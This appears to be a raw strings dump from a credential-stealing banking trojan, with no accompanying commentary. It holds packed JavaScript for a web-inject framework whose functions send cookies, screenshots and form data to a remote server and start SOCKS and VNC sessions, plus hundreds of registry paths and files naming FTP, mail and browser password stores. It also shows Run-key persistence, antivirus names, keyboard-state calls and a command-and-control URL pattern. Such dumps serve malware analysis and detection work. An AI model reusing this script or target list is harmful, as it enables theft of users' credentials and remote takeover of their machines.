function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
sqlite3_prepare
sqlite3_step
sqlite3_column_bytes
sqlite3_column_blob
SELECT hostname, encryptedUsername, encryptedPassword FROM moz_logins
PTF://
signons.sqlite
\profiles.ini
PathToExe
\Mozilla\Firefox\
Firefox
Software\Mozilla
fireFTPsites.dat
\Mozilla\SeaMonkey\
SeaMonkey
\Mozilla\Profiles\
Mozilla
password 51:b:
SMTP Password
HTTPMail Password
NNTP Password
IMAP Password
POP3 Password
SMTP Password2
HTTPMail Password2
NNTP Password2
IMAP Password2
POP3 Password2
IMAP Port
SMTP Port
POP3 Port
SMTP User
HTTPMail Server
HTTPMail User Name
HTTP Server URL
HTTP User
SMTP User Name
SMTP Server
SMTP Email Address
{X-X-X-XX-XXXXXX}
inetcomm server passwords
outlook account manager passwords
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Pstorec.dll
[VNC] EXEC: %s
IE WND [%0.8X] ENABLED: %s VISIBLED: %s
[%u] {%u, %u} {%u, %u} {%0.8X, %0.8X} = %s
[VDESK] Read CMD %u[%u]
[VDESK] NOT AUTH CMD %u
GetAsyncKeyState
USER32.DLL
GetKeyboardState
GetKeyState
?WINMM.DLL
?DSOUND.DLL
ZwConnectPort
NTDLL.DLL
[VNC] PROCESS=%s
\explorer.exe
[VNC] SearchApp Status = %u
[VNC] FileName = %s
[VNC] CmdLine = %s
[VNC] W64 Redir OLD=%u
[VNC] CreateProcess Status = %u (%u)
Chrome_WidgetWin_1
SysShadow
Chrome_WidgetWin_0
Dxtrans.dll
d3d11.dll
d3d9.dll
OPENGL32.dll
d2d1.dll
d3d10core.dll
d3d10.dll
d3d10_1core.dll
d3d10_1.dll
RegCloseKey
RegNotifyChangeKeyValue
ShellExecuteA
DeleteUrlCacheEntry
EnumWindows
ActivateKeyboardLayout
SetViewportOrgEx
RegEnumKeyExA
RegCreateKeyA
RegCreateKeyExA
RegOpenKeyExA
CryptImportKey
CryptDestroyKey
RegOpenKeyA
CertOpenSystemStoreA
CertDeleteCertificateFromStore
CertAddCertificateContextToStore
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
SHDeleteKeyA
FindFirstUrlCacheEntryA
FindNextUrlCacheEntryA
FindCloseUrlCache
FindNextUrlCacheEntryW
FindFirstUrlCacheEntryW
WinExec
KERNEL32.dll
MSVCRT.dll
IPHLPAPI.DLL
AVIFIL32.dll
GetWindowsDirectoryW
CallNamedPipeA
ConnectNamedPipe
CreateNamedPipeW
DisconnectNamedPipe
CreateNamedPipeA
GetWindowsDirectoryA
COMDLG32.dll
<&<,<2<\<
%WinDir%\Explorer.EXE
iexplore.exe
chrome.exe
\System32\kernel32.dll
\System32\kernelbase.dll
\ThemeApiPort

spoolsv.exe_1444_rwx_00F90000_00054000:

%Documents and Settings%\All Users\Application Data\IfarZozip\IfarZozip.dat
.text
.rdata
@.data
.reloc
t.FVSh4
_^SSSh
USER32.dll
GDI32.dll
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
WININET.dll
WS2_32.dll
More information: hXXp://VVV.ibsensoftware.com/
ole32.dll
OLEAUT32.dll
8CRYPT32.dll
NETAPI32.dll
HttpSendRequestW
HttpSendRequestExW
HttpSendRequestExA
HttpSendRequestA
HttpQueryInfoA
HttpOpenRequestW
HttpOpenRequestA
HttpAddRequestHeadersA
wininet.dll
rapport
ieframe.dll
NSPR4.DLL
nss3.dll
kernel32.dll
\Google\Chrome\User Data\Default\
\Mozilla\Firefox\Profiles\
sol_chrome/
\Google\Chrome\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\
@http
SELECT url FROM moz_places
places.sqlite
ie/history.txt
ff/history.txt
ff/%u/places.sqlite
framework_key%
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('l 1b(i){j.R=i;j.z=q;j.W=2;j.Q=l(){p(x K===\'I\'){K=l(){A{k E G("J.H.6.0")}B(e){}A{k E G("J.H.3.0")}B(e){}A{k E G("J.H")}B(e){}A{k E G("Y.H")}B(e){}k u}}k E K()};j.o=l(a,b,c,d){L f=j.Q();L g=q;L h=j;F=(x(d)==\'I\')?u:s;b=\'/\' j.R \'/\' 18.19() \'/\' b;p(F==s){j.z=q;f.1a=l(){A{p(f.T==4){p(f.O!=P||f.y==\'-\'){h.z=u;p(x(d)=="l"){d(u)}}C{p(f.y==\' \'){h.z=s;p(x(d)=="l"){d(s)}}C{h.z=f.y;p(x(d)=="l"){d(f.y)}}}}}B(e){h.z=u;p(x(d)=="l"){d(u)}}}}f.1e(a,b,F);f.1g(c);p(F==s){k s}A{p(f.T==4&&f.O==P){p(f.y==\'-\'){k u}C{p(f.y==\' \'){k s}C{k f.y}}}k u}B(e){k u}};j.1p=l(){k j.z};j.V=l(a,b,c){m=\'1/\' a;k j.o(\'v\',m,b,c)};j.X=l(a,b){m=\'2/\' a;k j.o(\'w\',m,q,b)};j.Z=l(a,b){m=\'3/\' a;k j.o(\'w\',m,q,b)};j.16=l(a){m=\'4/\';k j.o(\'w\',m,q,a)};j.17=l(a,b,c){t=(b==s)?\'S\':\'D\';k j.o(\'w\',\'5/\' t \'/\' a,q,c)};j.1c=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'5/\' t \'/\' a,c,d)};j.1d=l(a,b,c,d){t=(b==s)?\'S\':\'D\';p(x(c)==\'I\'||c==u){c=q;N=\'w\'}C{c=\'1f: \' c;N=\'v\'}k j.o(N,\'6/\' t \'/\' a,c,d)};j.M=l(a,b,c,d){t=(b==s)?\'S\':\'D\';k j.o(\'v\',\'7/\' t \'/\' a,c,d)};j.1h=l(a,b,c,d){m=\'8/\' b \'/\' c \'/\' 1i(a);k j.o(\'w\',m,q,d)};j.1j=l(a,b){m=\'9/\';k j.o(\'v\',m,a,b)};j.1k=l(a){m=\'10/\';k j.o(\'w\',m,q,a)};j.1l=l(a,b){m=\'11/\';k j.o(\'v\',m,a,b)};j.1m=l(a,b){m=\'12/\';k j.o(\'v\',m,a,b)};j.1n=l(a,b,c){m=\'13/\';M=a "\\r\\n" b;k j.o(\'v\',m,M,c)};j.1o=l(a,b){m=\'14/\' a;U=1q.1r.1s;k j.o(\'v\',m,U,b)};j.1t=l(a){m=\'15/\';k j.o(\'w\',m,q,a)}};',62,92,'|||||||||||||||||||this|return|function|Url||Query|if|null||true||false|POST|GET|typeof|responseText|_LastAsync|try|catch|else||new|Async|ActiveXObject|XMLHTTP|undefined|Msxml2|XMLHttpRequest|var|Post|Type|status|200|GetXHR|_Key||readyState|Data|SetVal|Version|GetVal|Microsoft|DelVal|||||||ClearVals|GetServer|Math|random|onreadystatechange|EQFramework|PostServer|Get|open|Cookie|send|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|GetLastAsync|document|location|href|StopVideo'.split('|'),0,{}));
eval('var %s '  
function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('=z k(){i.P=p;i.w=p;i.Y=3;i.O=k(){o(y N===\'H\'){N=k(){A{j z G("L.E.6.0")}B(e){}A{j z G("L.E.3.0")}B(e){}A{j z G("L.E")}B(e){}A{j z G("W.E")}B(e){}j s}}j z N()};i.m=k(a,b,c,d){J f=i.O();J g=p;J h=i;F=(y(d)==\'H\')?s:q;b=\'/\' i.P \'/\' 19.1a() \'/\' b;o(F==q){i.w=p;f.1p=k(){A{o(f.T==4){o(f.R!=Q||f.x==\'-\'){h.w=s;o(y(d)=="k"){d(s)}}C{o(f.x==\' \'){h.w=q;o(y(d)=="k"){d(q)}}C{h.w=f.x;o(y(d)=="k"){d(f.x)}}}}}B(e){h.w=s;o(y(d)=="k"){d(s)}}}}f.1b(a,b,F);f.1e(c);o(F==q){j q}A{o(f.T==4&&f.R==Q){o(f.x==\'-\'){j s}C{o(f.x==\' \'){j q}C{j f.x}}}j s}B(e){j s}};i.1g=k(){j i.w};i.1w=k(a,b,c){l=\'1/\' a;j i.m(\'u\',l,b,c)};i.X=k(a,b){l=\'2/\' a;j i.m(\'v\',l,p,b)};i.Z=k(a,b){l=\'3/\' a;j i.m(\'v\',l,p,b)};i.16=k(a){l=\'4/\';j i.m(\'v\',l,p,a)};i.17=k(a,b,c){t=(b==q)?\'S\':\'D\';j i.m(\'v\',\'5/\' t \'/\' a,p,c)};i.1c=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'5/\' t \'/\' a,c,d)};i.1d=k(a,b,c,d){t=(b==q)?\'S\':\'D\';o(y(c)==\'H\'||c==s){c=p;I=\'v\'}C{c=\'1f: \' c;I=\'u\'}j i.m(I,\'6/\' t \'/\' a,c,d)};i.M=k(a,b,c,d){t=(b==q)?\'S\':\'D\';j i.m(\'u\',\'7/\' t \'/\' a,c,d)};i.1h=k(a,b,c,d){l=\'8/\' b \'/\' c \'/\' 1i(a);j i.m(\'v\',l,p,d)};i.1j=k(a,b){l=\'9/\';j i.m(\'u\',l,a,b)};i.1k=k(a){l=\'10/\';j i.m(\'v\',l,p,a)};i.1l=k(a,b){l=\'11/\';j i.m(\'u\',l,a,b)};i.1m=k(a,b){l=\'12/\';j i.m(\'u\',l,a,b)};i.1n=k(a,b,c){l=\'13/\';M=a "\\r\\n" b;j i.m(\'u\',l,M,c)};i.1o=k(a,b){l=\'14/\' a;U=V.1q.1r;j i.m(\'u\',l,U,b)};i.1s=k(a){l=\'15/\';j i.m(\'v\',l,p,a)};i.1t=k(a){K=V.1u(a);K.1v.18(K)}};',62,95,'||||||||||||||||||this|return|function|Url|Query||if|null|true||false||POST|GET|_LastAsync|responseText|typeof|new|try|catch|else||XMLHTTP|Async|ActiveXObject|undefined|Type|var|El|Msxml2|Post|XMLHttpRequest|GetXHR|Key|200|status||readyState|Data|document|Microsoft|GetVal|Version|DelVal|||||||ClearVals|GetServer|removeChild|Math|random|open|PostServer|Get|send|Cookie|GetLastAsync|ScreenShot|encodeURIComponent|LogAdd|UpdateConfig|StartSocks|StartVnc|SendForm|StartVideo|onreadystatechange|location|href|StopVideo|Hide|getElementById|parentNode|SetVal'.split('|'),0,{}));
%s.Key = '%s';
%s.Hide('%0.8X%0.8X');
CertificateAuthority
%s.pfx
cookies.sqlite
cookies.sqlite-journal
ff/%u/cookies.sqlite
Software\df5a3418-685e-4e1f-a26a-aabf17af39b8
[%s - X32 EQ PID: %u TID: %u]
X-Firefox-Spdy
X-WebKit-CSP
hXXps://
HTTP/1.1 200 OK
Content-Length: %u
GET /favicon.ico HTTP/1.1
GET /favicon.ico HTTP/1.0
login=%s&pass=%s
KERNEL32.DLL
chrome.dll
127.0.0.1
Content-Type: application/x-www-form-urlencoded
Software\Microsoft\Windows\CurrentVersion\Run
regsvr32.exe "%s"
&info=%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.2X%0.4X%0.2X%0.4X&proxy=%s
[VNC] Parse param error: %s
\regsvr32.exe
[VNC] Fail create process: %u
[VNC] Fail inject to process: %u
fv_%u.avi
#FV_%u
#FV_%s
pass.txt
cert.pfx
PFXImportCertStore
Crypt32.dll
user_pref("network.http.spdy.enabled", false);
user_pref("network.http.spdy.enabled.v3", false);
user_pref("network.http.spdy.enabled.v3-1", false);
prefs.js
csrss.exe
smss.exe
wininit.exe
services.exe
svchost.exe
lsass.exe
lsm.exe
winlogon.exe
taskhost.exe
WININET.DLL
HttpEndRequestA
HttpEndRequestW
ADVAPI32.DLL
Init in Browser = %u
Init in Shell = %u
[Socks] Failt connect BC [%s:%u]
[Socks] Fail parse param: %s
#cert
[Pony] Fail Get Pass
DL_EXEC LOAD ERROR: %u = %s
DL_EXEC Status [Pipe]: %u-%u-%u
DL_EXEC Status[Local]: %u = %u
Start Socks addr: %s
Start Socks Status[Pipe]: %u-%u-%u
Start Socks Status[Local]: %u
Start VNC addr: %s
Start VNC Status[Pipe]: %u-%u-%u
Start VNC Status[Local]: %u
msvcrt.dll
%0.8X%0.8X%c
/work/1.php?sid=%0.8X%0.8X%0.4X%0.4X%0.2X%0.2X%0.4X
firefox.exe
explorer.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%Program Files%\Mozilla Firefox\
mozsqlite3.dll
sqlite3_open
sqlite3_exec
sqlite3_close
sqlite3_free
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
hXXp://
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
\\.\pipe\
PID: %u [%0.2u:%0.2u:%0.2u]
[BC] Cmd Ver Error
[BC] Wait Ping error %u[%u]
[BC] Fail Connect: %u
[BC] Fail read cmd
[BC] Cmd need reauth
[BC] cmd error: %u
[BC] Cmd need disconnect
ntdll.dll
Common Files\Doctor Web
Doctor Web
McAfee.com
DrWeb
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\
SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\
Kernel32.dll
gdiplus.dll
GdiplusShutdown
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
<HTTPMail_Password2
<IMAP_Password2
<SMTP_Password2
<POP3_Password2
account.cfg
account.cfn
Dir #%u
.oeaccount
Software\Microsoft\Windows Live Mail
\Microsoft\Windows Live Mail
Software\Microsoft\Windows Mail
\Microsoft\Windows Mail
PopPort
PopPassword
SmtpServer
SmtpPort
SmtpAccount
SmtpPassword
abe2869f-9b47-4cd9-a358-c22904dba7f7
MS IE FTP Passwords
Last Server Port
Last Server Pass
Server.Port
Server.User
Server.Host
Server.Pass
Password
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
\win.ini
WS_FTP
\Ipswitch\WS_FTP
\GlobalSCAPE\CuteFTP
sm.dat
\GlobalSCAPE\CuteFTP Pro
\GlobalSCAPE\CuteFTP Lite
\CuteFTP
CUTEFTP
Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
\Sites.dat
\Quick.dat
\History.dat
Software\BPFTP\Bullet Proof FTP\Main
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Options
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP
\SmartFTP
Favorites.dat
History.dat
Software\TurboFTP
\TurboFTP
addrbk.dat
quick.dat
Port
Login
PasswordType
profiles.xml
\FTP Explorer
Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
Software\FTP Explorer\Profiles
FtpSite.xml
RushSite.xml
\FTPRush
bitkinex.ds
NDSites.ini
Software\LeechFTP
bookmark.dat
CLSID\{11C1D741-A95B-11d2-8A80-0080ADB32FF4}\InProcServer32
sites.db
servers.xml
\FTPGetter
ESTdb2.dat
\Estsoft\ALFTP
QData.dat
SM.arch
FTP  .Link\shell\open\command
NppFTP.xml
Software\MAS-Soft\FTPInfo\Setup
ServerList.xml
\FTPInfo
NovaFTP.db
\INSoftware\NovaFTP
\sites.xml
ftplast.osd
\SharedSettings.ccs
\SharedSettings.sqlite
\SharedSettings_1_0_5.ccs
\SharedSettings_1_0_5.sqlite
\32BitFtp.ini
FTPCON
FTP CONTROL
FTPVoyager.ftp
\RhinoSoft.com
FTPVoyager.qc
FTPVoyager.Archive
SiteInfo.QFP
WinFTP
DeluxeFTP
sites.xml
Staff-FTP
sites.ini
FreshFTP
Software\FlashPeak\BlazeFtp\Settings
LastPassword
LastPort
BlazeFtp
site.dat
\BlazeFtp
GoFTP
Connections.txt
3D-FTP
\3D-FTP
SOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32
EasyFTP
FTPNow
FTP Now
FTPShell
ftpshell.fsi
ftpsite.ini
FTPList.db
My FTP
project.ini
Mailbox.ini
FTP Navigator
FTP Commander
ftplist.txt
Software\Sota\FFFTP
Software\Sota\FFFTP\Options
Software\FTPWare\COREFTP\Sites
FtpPort
Software\Cryer\WebSitePublisher
_Password
Software\NCH Software\ClassicFTP\FTPAccounts
FtpPassword
_FtpPassword
FtpServer
FtpUserName
FtpDirectory
Software\FTPClient\Sites
Software\SoftX.org\FTPClient\Sites
PortNumber
PassWord
Software\South River Technologies\WebDrive\Connections
Software\LinasFTP\Site Manager
FTP destination password
FTP destination server
FTP destination port
FTP destination user
FTP destination catalog
FTP profiles
Msi.dll
{74FF1730-B1F2-4D88-926B-1568FAE61DB7}
\PocoSystem.ini
accounts.ini
sites.dat
\LeapWare\LeapFTP
unleap.exe
leapftp
FtpIniName
Software\Ghisler\Windows Commander
wcx_PTF.ini
\sitemanager.xml
\recentservers.xml
\filezilla.xml
"password" : "
"password":"
\drives.js
\ExpanDrive\favorites.js
\ExpanDrive\drives.js
wiseftpsrvs.ini
wisePTF.ini
wiseftpsrvs.bin
SOFTWARE\Classes\TypeLib\{CB1F2C0F-8094-4AAC-BCF5-41A64E27F777}
SOFTWARE\Classes\TypeLib\{9EA55529-E122-4757-BC79-E4825F80732C}
FTP Count
FTP File%u
Robo-FTP
SOFTWARE\%s\FTPServers
user.config
.duck
SiteServer %u\Host
SiteServer %u\WebUrl
SiteServer %u\Remote Directory
SiteServer %u-User
SiteServer %u-User PW
SiteServer %u\SFTP
Keychain
Software\Nico Mak Computing\WinZip\FTP
PK11_GetInternalKeySlot
sqlite3.dll
